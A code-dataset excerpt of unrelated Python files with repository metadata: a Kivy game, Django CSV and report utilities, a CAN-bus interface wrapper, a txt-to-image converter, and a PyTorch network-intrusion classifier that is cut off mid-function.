layout.add_widget(game.ball_button)
layout.add_widget(Widget(size_hint=(1, 1)))
game.add_widget(layout)
# Play the chill.mp3 song
game.white_sound.loop = True
game.white_sound.volume = 0.08
game.white_sound.play()
logger.debug('Game: Game started')
return game
if __name__ == '__main__':
PongApp().run()
| ivan1dze/kivy | main.py | main.py | py | 10,431 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "config.log_config.LogConfig",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "kivy.uix.widget.Widget",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "os.listdir",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "config.... |
27639072195 | import csv
import datetime
import logging
from sme_ptrf_apps.core.models import Associacao, Periodo
from sme_ptrf_apps.core.models.arquivo import (
DELIMITADOR_PONTO_VIRGULA,
DELIMITADOR_VIRGULA,
ERRO,
PROCESSADO_COM_ERRO,
SUCESSO,
)
logger = logging.getLogger(__name__)
CODIGO_EOL = 0
PERIODO = 1
__DELIMITADORES = {',': DELIMITADOR_VIRGULA, ';': DELIMITADOR_PONTO_VIRGULA}
def processa_periodo_inicial(reader, arquivo):
logs = ""
importados = 0
erros = 0
for index, row in enumerate(reader):
if index != 0:
logger.info('Linha %s: %s', index, row)
associacao = get_associacao(str(row[CODIGO_EOL]).strip())
if not associacao:
msg_erro = f"Associação ({str(row[CODIGO_EOL])}) não encontrado. Linha: {index}"
logger.info(msg_erro)
logs = f"{logs}\n{msg_erro}"
erros += 1
continue
periodo = get_periodo(str(row[PERIODO]).strip())
if not periodo:
msg_erro = f"Período ({str(row[PERIODO])}) não encontrado. Linha: {index}"
logger.info(msg_erro)
logs = f"{logs}\n{msg_erro}"
erros += 1
continue
associacao.periodo_inicial = periodo
associacao.save()
logger.info("Periodo inicial da associação %s importado com sucesso.", associacao)
importados += 1
if importados > 0 and erros > 0:
arquivo.status = PROCESSADO_COM_ERRO
elif importados == 0:
arquivo.status = ERRO
else:
arquivo.status = SUCESSO
logs = f"{logs}\nImportados {importados} períodos iniciais. Erro na importação de {erros} períodos iniciais."
logger.info(f'Importados {importados} períodos iniciais. Erro na importação de {erros} períodos iniciais.')
arquivo.log = logs
arquivo.save()
def get_associacao(eol):
if Associacao.objects.filter(unidade__codigo_eol=eol).exists():
return Associacao.objects.filter(unidade__codigo_eol=eol).get()
return None
def get_periodo(referencia):
if Periodo.objects.filter(referencia=referencia).exists():
return Periodo.objects.filter(referencia=referencia).get()
return None
def carrega_periodo_inicial(arquivo):
logger.info("Executando Carga de Período inicial para associações.")
arquivo.ultima_execucao = datetime.datetime.now()
try:
with open(arquivo.conteudo.path, 'r', encoding="utf-8") as f:
sniffer = csv.Sniffer().sniff(f.readline())
f.seek(0)
if __DELIMITADORES[sniffer.delimiter] != arquivo.tipo_delimitador:
msg_erro = f"Formato definido ({arquivo.tipo_delimitador}) é diferente do formato do arquivo csv ({__DELIMITADORES[sniffer.delimiter]})"
logger.info(msg_erro)
arquivo.status = ERRO
arquivo.log = msg_erro
arquivo.save()
return
reader = csv.reader(f, delimiter=sniffer.delimiter)
processa_periodo_inicial(reader, arquivo)
logger.info("Carga de Períodos efetuada com sucesso.")
except Exception as err:
logger.info("Erro ao processar períodos: %s", str(err))
arquivo.log = "Erro ao processar períodos."
arquivo.save()
| rochalet/SME-PTRF-BackEnd | sme_ptrf_apps/core/services/periodo_inicial.py | periodo_inicial.py | py | 3,373 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sme_ptrf_apps.core.models.arquivo.DELIMITADOR_VIRGULA",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "sme_ptrf_apps.core.models.arquivo.DELIMITADOR_PONTO_VIRGULA",
"line_n... |
24877020550 | # coding: utf-8
"""
Ctypes wrapper module for BUSMUST CAN Interface on win32/win64 systems.
Authors: busmust <busmust@126.com>, BUSMUST Co.,Ltd.
"""
# Import Standard Python Modules
# ==============================
import ctypes
import logging
import sys
import time
try:
# Try builtin Python 3 Windows API
from _winapi import WaitForSingleObject, INFINITE
HAS_EVENTS = True
except ImportError:
try:
# Try pywin32 package
from win32event import WaitForSingleObject, INFINITE
HAS_EVENTS = True
except ImportError:
# Use polling instead
HAS_EVENTS = False
# Import Modules
# ==============
from can import BusABC, Message, CanError
from can.bus import BusState
from can.util import len2dlc, dlc2len
from .exceptions import BmError
# Define Module Logger
# ====================
LOG = logging.getLogger(__name__)
# Import safely Vector API module for Travis tests
bmapi = None
try:
from . import bmapi
except Exception as exc:
LOG.warning('Could not import bmapi: %s', exc)
class BmCanBus(BusABC):
"""The CAN Bus implemented for the BUSMUST USB-CAN interface."""
__initialized = False
@classmethod
def __init_class__(cls):
if bmapi is None:
raise ImportError("The BMAPI has not been loaded")
if not BmCanBus.__initialized:
bmapi.BM_Init()
BmCanBus.__initialized = True
def __init__(self, channel,
fd=True, receive_own_messages=False, listen_only=False,
bitrate=500000, data_bitrate=500000,
tres=False,
can_filters=None,
**kwargs):
"""
:param int channel:
The channel index to create this bus with, which is the index to all available ports when enumerating Busmust devices.
Can also be a string of the channel's full name. i.e. "BM-CANFD-X1-PRO(1234) CH1"
:param bool fd:
If CAN-FD frames should be supported.
:param bool receive_own_messages:
If Loopback mode should be supported.
:param bool listen_only:
If Listen only mode should be supported, this is the same as setting 'state' property to INACTIVE.
:param int bitrate:
Bitrate in bits/s.
:param int data_bitrate:
Which bitrate to use for data phase in CAN FD.
Defaults to arbitration bitrate.
:param bool tres:
If 120Ohm CAN terminal register should be enabled.
"""
BmCanBus.__init_class__()
self._bmapi = bmapi # Enable external access
infolist = bmapi.BM_ChannelInfoListTypeDef()
numOfInfo = ctypes.c_int(len(infolist.entries))
bmapi.BM_Enumerate(ctypes.byref(infolist), ctypes.byref(numOfInfo))
if isinstance(channel, int):
if channel < numOfInfo.value:
self._channelinfo = infolist.entries[channel]
else:
raise BmError(bmapi.BM_ERROR_NODRIVER, "Channel %d is not connected or is in use by another app." % channel, "BmCanBus.__init__")
elif isinstance(channel, str):
for info in infolist.entries:
if info.name.decode() == channel:
self._channelinfo = info
break
else:
raise BmError(bmapi.BM_ERROR_NODRIVER, "Channel %s is not connected or is in use by another app." % channel, "BmCanBus.__init__")
self._mode = bmapi.BM_CAN_NORMAL_MODE
if not fd:
self._mode = bmapi.BM_CAN_CLASSIC_MODE
elif receive_own_messages:
self._mode = bmapi.BM_CAN_EXTERNAL_LOOPBACK_MODE
elif listen_only:
self._mode = bmapi.BM_CAN_LISTEN_ONLY_MODE
self._tres = bmapi.BM_TRESISTOR_DISABLED
if tres:
self._tres = bmapi.BM_TRESISTOR_120
self._bitrate = bmapi.BM_BitrateTypeDef()
self._bitrate.nbitrate = int(bitrate / 1000)
self._bitrate.dbitrate = int(data_bitrate / 1000)
self._handle = bmapi.BM_ChannelHandle()
bmapi.BM_OpenEx(
ctypes.byref(self._handle),
ctypes.byref(self._channelinfo),
self._mode,
self._tres,
ctypes.byref(self._bitrate),
ctypes.cast(ctypes.c_void_p(), ctypes.POINTER(bmapi.BM_RxFilterListTypeDef)), 0
)
self.channel_info = self._channelinfo.name.decode()
startTimestamp = ctypes.c_uint32()
bmapi.BM_GetTimestamp(self._handle, ctypes.byref(startTimestamp))
self._time_offset = time.time() - startTimestamp.value * 1e-9
self._notification = bmapi.BM_NotificationHandle()
bmapi.BM_GetNotification(self._handle, ctypes.byref(self._notification))
super(BmCanBus, self).__init__(channel=channel, can_filters=can_filters, **kwargs)
time.sleep(0.05)
self._state = BusState.ACTIVE
self._isotp_config = bmapi.BM_IsotpConfigTypeDef()
def _apply_filters(self, filters):
if filters:
# Only up to one filter per ID type allowed
if len(filters) == 1 or (len(filters) == 2 and filters[0].get("extended") != filters[1].get("extended")):
bmfilters = bmapi.BM_RxFilterListTypeDef()
try:
for i in range(len(filters)):
can_filter = filters[i]
bmfilters.entries[i].type = bmapi.BM_RXFILTER_BASIC
bmfilters.entries[i].flags_mask = bmapi.BM_MESSAGE_FLAGS_IDE
if can_filter.get("extended"):
bmfilters.entries[i].flags_value = bmapi.BM_MESSAGE_FLAGS_IDE
bmfilters.entries[i].id_mask = (can_filter["can_mask"] >> 18) | ((can_filter["can_mask"] & 0x3FFFF) << 11)
bmfilters.entries[i].id_value = (can_filter["can_id"] >> 18) | ((can_filter["can_id"] & 0x3FFFF) << 11)
else:
bmfilters.entries[i].flags_value = 0
bmfilters.entries[i].id_mask = can_filter["can_mask"]
bmfilters.entries[i].id_value = can_filter["can_id"]
bmapi.BM_SetRxFilters(self._handle, ctypes.byref(bmfilters), len(bmfilters.entries))
time.sleep(0.05)
except BmError as exc:
LOG.warning("Could not set filters: %s", exc)
# go to fallback
else:
self._is_filtered = True
return
else:
LOG.warning("Only up to one filter per extended or standard ID allowed")
# go to fallback
# fallback: reset filters
self._is_filtered = False
try:
bmfilters = bmapi.BM_RxFilterListTypeDef() # Default as invalid => allow all messages to pass
bmapi.BM_SetRxFilters(self._handle, ctypes.byref(bmfilters), 2)
time.sleep(0.05)
except BmError as exc:
LOG.warning("Could not reset filters: %s", exc)
def _recv_internal(self, timeout):
end_time = time.time() + timeout if timeout is not None else None
bmmsg = bmapi.BM_CanMessageTypeDef()
channel = ctypes.c_uint32()
timestamp = ctypes.c_uint32()
while True:
try:
bmapi.BM_ReadCanMessage(self._handle, ctypes.byref(bmmsg), ctypes.byref(channel), ctypes.byref(timestamp))
except BmError as exc:
if exc.error_code != bmapi.BM_ERROR_QRCVEMPTY:
raise
else:
msg_id = bmmsg.mid.getExtendedId() if bmmsg.ctrl.rx.IDE else bmmsg.mid.getStandardId()
dlc = dlc2len(bmmsg.ctrl.rx.DLC)
msg = Message(
timestamp=timestamp.value * 1e-6 + self._time_offset,
arbitration_id=msg_id & 0x1FFFFFFF,
is_extended_id=bool(bmmsg.ctrl.rx.IDE),
is_remote_frame=bool(bmmsg.ctrl.rx.RTR),
is_error_frame=bool(False),
is_fd=bool(bmmsg.ctrl.rx.FDF),
error_state_indicator=bool(bmmsg.ctrl.rx.ESI),
bitrate_switch=bool(bmmsg.ctrl.rx.BRS),
dlc=dlc,
data=bmmsg.payload[:dlc],
channel=channel.value)
return msg, self._is_filtered
if end_time is not None and time.time() > end_time:
return None, self._is_filtered
# Wait for receive event to occur
if timeout is None:
time_left_ms = INFINITE
else:
time_left = end_time - time.time()
time_left_ms = max(0, int(time_left * 1000))
bmapi.BM_WaitForNotifications(ctypes.byref(self._notification), 1, time_left_ms)
def send(self, msg, timeout=None):
bmmsg = bmapi.BM_CanMessageTypeDef()
if msg.is_extended_id:
bmmsg.mid.SID = msg.arbitration_id >> 18
bmmsg.mid.EID = (msg.arbitration_id & 0x3FFFF)
else:
bmmsg.mid.SID = msg.arbitration_id
bmmsg.mid.EID = 0
bmmsg.ctrl.tx.IDE = 1 if msg.is_extended_id else 0
bmmsg.ctrl.tx.FDF = 1 if msg.is_fd else 0
bmmsg.ctrl.tx.BRS = 1 if msg.bitrate_switch else 0
bmmsg.ctrl.tx.RTR = 1 if msg.is_remote_frame else 0
bmmsg.ctrl.tx.ESI = 1 if msg.error_state_indicator else 0
bmmsg.ctrl.tx.DLC = len2dlc(msg.dlc)
bmmsg.payload[:len(msg.data)] = msg.data
timestamp = ctypes.c_uint32()
bmapi.BM_WriteCanMessage(self._handle, ctypes.byref(bmmsg), 0, int(timeout*1000) if timeout else -1, ctypes.byref(timestamp))
def shutdown(self):
bmapi.BM_Close(self._handle)
self._handle = bmapi.BM_ChannelHandle()
def reset(self):
bmapi.BM_Reset(self._handle)
@property
def state(self):
return self._state
@state.setter
def state(self, new_state):
mode_changed = False
self._state = new_state
if new_state is BusState.ACTIVE:
if self._mode == bmapi.BM_CAN_OFF_MODE or self._mode == bmapi.BM_CAN_LISTEN_ONLY_MODE:
self._mode = bmapi.BM_CAN_NORMAL_MODE
mode_changed = True
else:
pass # Do not change (i.e. loopback)
elif new_state is BusState.PASSIVE:
# When this mode is set, the CAN controller does not take part on active events (eg. transmit CAN messages)
# but stays in a passive mode (CAN monitor), in which it can analyse the traffic on the CAN bus used by a BMCAN channel.
if self._mode != bmapi.BM_CAN_LISTEN_ONLY_MODE:
self._mode = bmapi.BM_CAN_LISTEN_ONLY_MODE
mode_changed = True
if mode_changed:
bmapi.BM_SetCanMode(self._handle, self._mode)
@classmethod
def enumerate(cls):
BmCanBus.__init_class__()
infolist = bmapi.BM_ChannelInfoListTypeDef()
numOfInfo = ctypes.c_int(len(infolist.entries))
bmapi.BM_Enumerate(ctypes.byref(infolist), ctypes.byref(numOfInfo))
channellist = []
for i in range(numOfInfo.value):
channellist.append({
'index': i,
'name': infolist.entries[i].name.decode(),
# Add other exports here
})
return channellist
def send_isotp(self, payload, timeout=-1):
timeout_ms = int(timeout * 1000.0) if timeout >= 0 else -1
bmapi.BM_WriteIsotp(self._handle, ctypes.c_char_p(payload), len(payload), timeout_ms, ctypes.byref(self._isotp_config))
def receive_isotp(self, timeout=-1, max_len=4095):
timeout_ms = int(timeout * 1000.0) if timeout >= 0 else -1
buf = ctypes.create_string_buffer(max_len)
received_len = ctypes.c_uint32(len(buf))
bmapi.BM_ReadIsotp(self._handle, buf, ctypes.byref(received_len), timeout_ms, ctypes.byref(self._isotp_config))
return bytes(buf[:received_len.value])
def config_isotp(self, tester_msg_id, ecu_msg_id, mode=bmapi.BM_ISOTP_NORMAL_TESTER, **kwargs):
self._isotp_config.mode = mode
enable_fdf = kwargs.get('fd', False) or kwargs.get('fdf', False)
enable_brs = kwargs.get('brs', enable_fdf)
enable_ide = kwargs.get('ide', False) or tester_msg_id > 0x7FF or ecu_msg_id > 0x7FF
dlc = kwargs.get('dlc', 0xF if enable_fdf else 0x8)
testerMsg = self._isotp_config.testerDataTemplate.getCanMessage()
testerMsg.ctrl.tx.FDF = enable_fdf
testerMsg.ctrl.tx.BRS = enable_brs
testerMsg.ctrl.tx.IDE = enable_ide
testerMsg.ctrl.tx.DLC = dlc
testerMsg.setMessageId(tester_msg_id)
self._isotp_config.testerDataTemplate.setCanMessage(testerMsg)
ecuMsg = self._isotp_config.ecuDataTemplate.getCanMessage()
ecuMsg.ctrl.tx.FDF = enable_fdf
ecuMsg.ctrl.tx.BRS = enable_brs
ecuMsg.ctrl.tx.IDE = enable_ide
ecuMsg.ctrl.tx.DLC = dlc
ecuMsg.setMessageId(ecu_msg_id)
self._isotp_config.ecuDataTemplate.setCanMessage(ecuMsg)
padding = kwargs.get('padding', None)
if padding is not None:
self._isotp_config.paddingEnabled = 1
self._isotp_config.paddingValue = ctypes.c_uint8(padding)
else:
self._isotp_config.paddingEnabled = 0
| Aceinna/acenav-cli | src/aceinna/devices/widgets/can/interfaces/bmcan/canlib.py | canlib.py | py | 13,564 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "can.BusABC",
"line_number": 48,
"usage_type": "name"
},
{
"api_name": "ctypes.c_int",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "ctypes.byref",
"line_nu... |
29110585681 | #-*- encoding: UTF-8 -*-
import urllib
from AlyMoly.reporte.excepciones import AbstractClassException
from AlyMoly.settings import REPORT_HOST, REPORT_PORT, REPORT_APP, REPORT_DIR,\
NOMBRE_SUCURSAL, CANTIDAD_PRODUCTOS_MAS_VENDIDOS,\
CANTIDAD_PROMOCIONES_MAS_VENDIDAS
from AlyMoly.reporte.conexion import URLRetriever
from django.http import HttpResponse
from django.core.urlresolvers import reverse
from HTMLParser import HTMLParser
import htmlentitydefs
class HTMLReportFixer(HTMLParser):
"""Cambia el título de una página html, a un titulo más institucional"""
def __init__(self):
HTMLParser.__init__(self)
self.flag = False
self.pieces = []
def handle_starttag(self, tag, attrs):
if tag == 'title':
self.flag = True
if tag == 'img':
new_attrs = []
for k,v in attrs:
if k == 'src':
v = v.replace('/birt/preview',reverse('reporte:get_birt_img'))
new_attrs.append((k,v.encode()))
attrs = new_attrs
strattrs = "".join([' %s="%s"' % (key, value) for key, value in attrs])
self.pieces.append("<%(tag)s%(strattrs)s>" % locals())
def handle_endtag(self, tag):
if tag == 'title':
self.flag = False
self.pieces.append("</%(tag)s>" % locals())
def handle_data(self, data):
if self.flag:
data = "Reporte | %s" % (NOMBRE_SUCURSAL)
self.pieces.append("%(data)s" % locals())
def handle_charref(self,ref):
self.pieces.append("&#%(ref)s;" % locals())
def handle_comment(self, text):
self.pieces.append("<!--%(text)s-->" % locals())
def handle_entityref(self, ref):
self.pieces.append("&%(ref)s" % locals())
if htmlentitydefs.entitydefs.has_key(ref):
self.pieces.append(";")
def handle_pi(self, text):
self.pieces.append("<?%(text)s>" % locals())
def handle_decl(self, text):
self.pieces.append("<!%(text)s>" % locals())
def output(self):
return "".join(self.pieces).replace("\n",'').strip()
class Reporte(object):
"""Clase abstracta padre que implementa la representacion un reporte genérico de
archivo de reporte"""
HTML = 'html'
PDF = 'pdf'
FORMATO = ( HTML, )
def __new__(self, *args):
if self is Reporte :
raise AbstractClassException
return object.__new__(self)
def __init__(self,data):
self.extension = "rptdesign"
self.params = {}
self.formato = data['formato']
def __unicode__(self):
return self.nombre + '.' + self.extension
def get_url_params(self):
list_params = []
for key,val in self.params.items():
list_params.append(key + "=" + urllib.quote(str(val)))
url_params = "&".join(list_params)
if url_params != '':
return "&"+url_params
return ''
def get_filename(self):
return "%s.%s" % (self.nombre,self.extension)
def get_url(self):
return ("http://%s:%s/%s/preview?__format=%s&__report=%s%s" % (REPORT_HOST,
REPORT_PORT,
REPORT_APP,
self.formato,
REPORT_DIR, self.get_filename())) + self.get_url_params()
def get_response(self):
retriever = URLRetriever(self.get_url())
response = None
if self.formato == 'pdf':
response = HttpResponse(retriever.get(),mimetype='application/pdf')
response['Content-Disposition'] = 'attachment; filename=%s.pdf' % self.__class__.__name__
else:
parser = HTMLReportFixer()
parser.feed(retriever.get())
response = HttpResponse(parser.output())
return response
class ReportePeriodoTiempo(Reporte):
def __new__(self, *args):
if self is ReportePeriodoTiempo :
raise AbstractClassException
return object.__new__(self)
def __init__(self,data):
super(ReportePeriodoTiempo,self).__init__(data)
fecha_inicio = 'fecha_inicio'
fecha_fin = 'fecha_fin'
if data.get('fecha',False):
fecha_inicio = fecha_fin = 'fecha'
self.params.update({'fecha_inicio':data[fecha_inicio].strftime('%Y-%m-%d'),
'fecha_fin':data[fecha_fin].strftime('%Y-%m-%d')})
########## REPORTES ##########
class Productos(Reporte):
def __init__(self,data):
super(Productos,self).__init__(data)
self.nombre = "Productos"
class ProductosCodigoBarra(Reporte):
def __init__(self,data):
super(ProductosCodigoBarra,self).__init__(data)
self.nombre = "ProductosCodigoBarra"
class ProductosCodigoManual(Reporte):
def __init__(self,data):
super(ProductosCodigoManual,self).__init__(data)
self.nombre = "ProductosCodigoManual"
class ProductosExentos(Reporte):
def __init__(self,data):
super(ProductosExentos,self).__init__(data)
self.nombre = "ProductosExentos"
class ProductosAfectos(Reporte):
def __init__(self,data):
super(ProductosAfectos,self).__init__(data)
self.nombre = "ProductosAfectos"
class Promociones(Reporte):
def __init__(self,data):
super(Promociones,self).__init__(data)
self.nombre = "Promociones"
class Existencias(Reporte):
def __init__(self,data):
super(Existencias,self).__init__(data)
self.nombre = "Existencias"
self.params.update({
'bodega_id':data['bodega'],
})
class ExistenciaPorCategoria(Reporte):
def __init__(self,data):
super(ExistenciaPorCategoria,self).__init__(data)
self.nombre = "ExistenciasPorCategoria"
self.params.update({
'bodega_id':data['bodega'],
'categoria_id':data['categoria']
})
class VentasPorTurno(Reporte):
def __init__(self,data):
super(VentasPorTurno,self).__init__(data)
self.nombre = "EstadoDeTurno"
self.params.update({
'turno_id':data['turno'],
})
class VentasPorTurnoDetalle(Reporte):
def __init__(self,data):
super(VentasPorTurnoDetalle,self).__init__(data)
self.nombre = "VentasPorTurno"
self.params.update({
'turno_id':data['turno'],
})
class VentasPorTurnoResumenAfectos(Reporte):
def __init__(self,data):
super(VentasPorTurnoResumenAfectos,self).__init__(data)
self.nombre = "VentasPorTurnoResumenAfectos"
self.params.update({
'turno_id':data['turno'],
})
class VentasPorTurnoResumenExentos(Reporte):
def __init__(self,data):
super(VentasPorTurnoResumenExentos,self).__init__(data)
self.nombre = "VentasPorTurnoResumenExentos"
self.params.update({
'turno_id':data['turno'],
})
class VentasPorTurnoResumenDevoluciones(Reporte):
def __init__(self,data):
super(VentasPorTurnoResumenDevoluciones,self).__init__(data)
self.nombre = "VentasPorTurnoResumenDevoluciones"
self.params.update({
'turno_id':data['turno'],
})
class VentasPorTurnoResumenPromociones(Reporte):
def __init__(self,data):
super(VentasPorTurnoResumenPromociones,self).__init__(data)
self.nombre = "VentasPorTurnoResumenPromociones"
self.params.update({
'turno_id':data['turno'],
})
class VentasPorTurnoResumenStockCritico(Reporte):
def __init__(self,data):
super(VentasPorTurnoResumenStockCritico,self).__init__(data)
self.nombre = "VentasPorTurnoResumenStockCritico"
self.params.update({
'turno_id':data['turno'],
})
class VentasPorMes(Reporte):
def __init__(self,data):
super(VentasPorMes,self).__init__(data)
self.nombre = "VentaPorMes"
fecha = data['anio'] + '-' + data['mes'] + '-01'
self.params.update({
'mes_turno':fecha,
})
class VentasGraficoProducto(ReportePeriodoTiempo):
def __init__(self,data):
super(VentasGraficoProducto,self).__init__(data)
self.nombre = "VentaGraficoProductosPorFechaPorCategorias"
self.params.update({
'cantidad':CANTIDAD_PRODUCTOS_MAS_VENDIDOS,
})
class VentasGraficoPromocion(ReportePeriodoTiempo):
def __init__(self,data):
super(VentasGraficoPromocion,self).__init__(data)
self.nombre = "VentaGraficoPromocionesPorFechaPorCategorias"
self.params.update({
'cantidad':CANTIDAD_PRODUCTOS_MAS_VENDIDOS,
})
class VentasGraficoProductoPorCategoria(ReportePeriodoTiempo):
def __init__(self,data):
super(VentasGraficoProductoPorCategoria,self).__init__(data)
self.nombre = "VentaGraficoProductosPorFechaPorCategoria"
self.params.update({
'cantidad':CANTIDAD_PROMOCIONES_MAS_VENDIDAS,
'categoria_id':data.get("categoria"),
})
class VentasGraficoPromocionPorCategoria(ReportePeriodoTiempo):
def __init__(self,data):
super(VentasGraficoPromocionPorCategoria,self).__init__(data)
self.nombre = "VentaGraficoPromocionesPorFechaPorCategoria"
self.params.update({
'cantidad':CANTIDAD_PROMOCIONES_MAS_VENDIDAS,
'categoria_id':data.get("categoria"),
})
class VentasPorMesResumido(Reporte):
def __init__(self,data):
super(VentasPorMesResumido,self).__init__(data)
self.nombre = "VentaPorMesResumido"
fecha = data['anio'] + '-' + data['mes'] + '-01'
self.params.update({
'mes_turno':fecha,
})
| CreceLibre/alymoly | AlyMoly/reporte/clases.py | clases.py | py | 10,496 | python | es | code | 0 | github-code | 1 | [
{
"api_name": "HTMLParser.HTMLParser",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "HTMLParser.HTMLParser.__init__",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "HTMLParser.HTMLParser",
"line_number": 17,
"usage_type": "name"
},
{
"api_na... |
18209204664 | from const import *
import sys
from datetime import datetime
import numpy as np
import cv2
import os
from time import sleep
from threading import *
from utils import *
def removeTxt(txtBuffer):
import os
txtFileList = os.listdir(txtBuffer)
for item in txtFileList:
if item.endswith(".txt"):
os.remove(os.path.join(txtBuffer, item))
def storeTxtToJpg(TXT_PATH,IMAGE_PATH,label,mode="dataCollection"):
"""
TXT_PATH: folder name of the txt files
IMAGE_PATH: destinated image folder to save, DO NOT include filename like .jpg
mode: 'dataCollection' or 'prediction'
"""
def arrayFromFile(file_name):
arr=[]
status=-1
try:
with open(file_name,'r') as f:
for line in f.readlines(): #line is a string
line_arr=[float(x) for x in line.split(",")]
arr.append(line_arr)
arr=np.array(arr)
status=True
except:
status=False
return arr, status
def isEmptyTxt(file_name):
return os.stat(f"{file_name}").st_size == 0
def currentTimeInfo():
return datetime.now().strftime("%Y%m%d_%H%M%S")
#convert all txt files from {TXT_PATH} into jpg images and store them in {IMAGE_PATH}
#1. list all files name with txt extension
if mode=="dataCollection":
destination_folder= os.path.join(IMAGE_PATH,f"{label}")
for file in os.listdir(TXT_PATH):
if file.endswith(".txt"):
file_name=os.path.join(TXT_PATH,file)
if not isEmptyTxt(file_name):
print(file_name)
img_array,result=arrayFromFile(file_name)
if (result==False or result==-1):
continue
if (result==-1):
raise Exception("error occur in arrayFromFile()")
sleep(1)
#cv2.imwrite(img_)
#path=os.path.join("images","your_file.jpg")
output_path=os.path.join(destination_folder,currentTimeInfo()+".jpg")
print(f"output_path={output_path}")
cv2.imwrite(output_path,img_array)
#print("complete image writing")
elif mode=="prediction":
destination_folder= os.path.join(IMAGE_PATH,f"{label}")
for file in os.listdir(TXT_PATH):
if file.endswith(".txt"):
file_name=os.path.join(TXT_PATH,file)
if not isEmptyTxt(file_name):
print(file_name)
img_array=arrayFromFile(file_name)
sleep(1)
#cv2.imwrite(img_)
#path=os.path.join("images","your_file.jpg")
output_path=os.path.join(destination_folder,"0.jpg")
print(f"output_path={output_path}")
cv2.imwrite(output_path,img_array)
print("complete image writing")
else:
raise Exception("INVALID MODE IN storeTxtToJpg()")
quit()
def moveToBuffer(FromPath,ToPath):
print("moving files from txtStorage to txtBuffer")
source = FromPath
destination = ToPath
# gather all files
allfiles = os.listdir(source)
# iterate on all files to move them to destination folder
for f in allfiles:
src_path = os.path.join(source, f)
dst_path = os.path.join(destination, f)
os.rename(src_path, dst_path)
if __name__=='__main__':
if len(sys.argv)!=3:#test 0
raise Exception("""MISSING ARGUMENT(S)!!!
python3 txtToJpg.py [train/test] [label]
""")
print("QUITTED")
quit()
if not (sys.argv[1]=='test' or sys.argv[1]=='train'):
print("NO SUCH MODE, PLEASE ENTER test or train as mode")
print("QUIT")
quit()
jsonAccesser=ConfJsonDictAccesser()
conf_json_dict=jsonAccesser.get_dict()
modelDataType=conf_json_dict["modelDataType"]
if sys.argv[1]=='test':
if modelDataType==jsonAccesser.DataLengthType.fix:
path=FIXED_LENGTH_TEST_PATH
elif modelDataType==jsonAccesser.DataLengthType.unfix:
path=VARIED_LENGTH_TEST_PATH
elif sys.argv[1]=='train':
if modelDataType==jsonAccesser.DataLengthType.fix:
path=FIXED_LENGTH_TRAIN_PATH
elif modelDataType==jsonAccesser.DataLengthType.unfix:
path=VARIED_LENGTH_TRAIN_PATH
moveToBuffer(TXT_PATH,TXT_BUFFER)
storeTxtToJpg(TXT_BUFFER,path,sys.argv[2])
removeTxt(TXT_BUFFER)
| navilo314hku/FYP | txtToJpg.py | txtToJpg.py | py | 4,636 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.listdir",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.remove",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 16,
... |
727279415 | from torchvision import models
import torch.nn.functional as nnf
import torch.nn as nn
import utilities
import config
import torch
import time
import sys
import os
class Classify():
def __init__(self, logs):
self.logs = logs
self.modelPath = os.path.join(config.ROOT_DIRECTORY,config.MODEL_ROOT_DIR)
#Nastavenie počiatočných parametrov pre predikciu neurónovou siete
self.device = torch.device(config.TORCH_DEVICE if torch.cuda.is_available() else "cpu")
if self.device.type == 'cuda':
self.logs.logger.info(f"Initiasaion: Using {self.device.type} on {torch.cuda.get_device_name(torch.cuda.current_device())} as torch device")
else:
self.logs.logger.info(f"Initiasaion: Using {self.device.type} as torch device.")
self._loadModel()
#Otvorenie zvoleného modelu pomocou Pytorch a jeho príprava na predikciu
def _loadModel(self):
try:
startTime = time.time()
if config.TORCH_MODEL == "mobilenet_v3_large":
self.model = models.mobilenet_v3_large(pretrained=False)
elif config.TORCH_MODEL == "efficientnet_b7":
self.model = models.efficientnet_b7(pretrained=False)
self.model.classifier[1] = nn.Linear(in_features=2560, out_features=20)
self.model.load_state_dict(torch.load(os.path.join(self.modelPath, f"{config.TORCH_MODEL}.pth")))
self.model.eval()
self.model.to(self.device)
self.logs.logger.info(f"Initiasaion: Model {config.TORCH_MODEL.split('.')[0]} is loaded.")
if config.LOG_TIME: self.logs.logger.info(f"Model initiasation took {time.time()-startTime:.4f}s")
except:
self.logs.logger.critical("Something when wrong during torch model initialisation")
sys.exit(1)
#Skontrolovanie výstupu z neurónovej siete po predikcií
def _checkPrediction(self,output, fileName):
#Úprava výstupu do percentuálnej formy a výber najväčšej hodnoty
probs = nnf.softmax(output, dim=1)
topProb, topClass = probs.topk(1, dim = 1)
mappedClass = topClass.item()
#Mapovanie výstupu na kategóriu
if mappedClass < 16:
mappedClass = config.REVERSE_CATEGORIES_MAP[mappedClass]
#Odstránenie špecifického názvu útoku
if not config.CATEGORIES_FULL_NAME: mappedClass = str(mappedClass).split(' ')[0]
#Zaznamenanie výsledku do logov
if int(topClass.item()) > 0:
if fileName.split('.')[-1] == "csv":
self.logs.logger.warning(f"{float(topProb.item()*100):.4f}% {fileName} CSV {mappedClass}")
else:
self.logs.logger.info(f"{float(topProb.item()*100):.4f}% {fileName} Image {mappedClass}")
else:
if fileName.split('.')[-1] == "csv":
path = os.path.join(config.ROOT_DIRECTORY, config.CSV_DIRECTORY)
utilities.csvRename(path, fileName, "FP"+fileName) #Tagovanie súboru v prípade FP
self.logs.logger.info(f"{float(topProb.item()*100):.4f}% {fileName} CSV {mappedClass} FalsePositive")
else:
self.logs.logger.info(f"{float(topProb.item()*100):.4f}% {fileName} Image {mappedClass} Negative")
return (float(topProb.item()),mappedClass)
#Vytvorenie predikcie na obrázkoch
def getPrediction(self,image):
startTime = time.time()
try:
with torch.no_grad():
input = image[0].unsqueeze(0)
input = input.to(self.device)
outputs = self.model.forward(input)
